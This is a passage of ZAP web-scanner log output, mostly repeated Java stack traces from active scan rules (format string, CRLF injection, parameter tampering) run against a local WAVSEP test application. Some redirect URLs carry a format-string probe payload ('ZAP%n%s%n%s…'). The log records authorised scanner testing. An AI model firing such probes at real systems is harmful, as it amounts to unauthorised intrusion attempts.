org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5567730 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5568369 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5568369 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5568570 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5568570 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:155) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5570184 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5576011 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | FormatString in 147.396s 5576011 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestInjectionCRLF strength LOW threshold MEDIUM 5720993 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestInjectionCRLF in 144.982s 5720993 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestParameterTamper strength LOW threshold MEDIUM 5729353 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 5729353 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 5729363 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 5730133 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 5730136 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 5817766 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5832167 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5867745 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - unsupported protocol: '172.17.0.2' java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:114) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5867769 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5867951 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5867952 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Connection refused java.net.ConnectException: Connection refused at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339) at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200) at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5867973 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5867987 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - java.net.UnknownHostException: at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 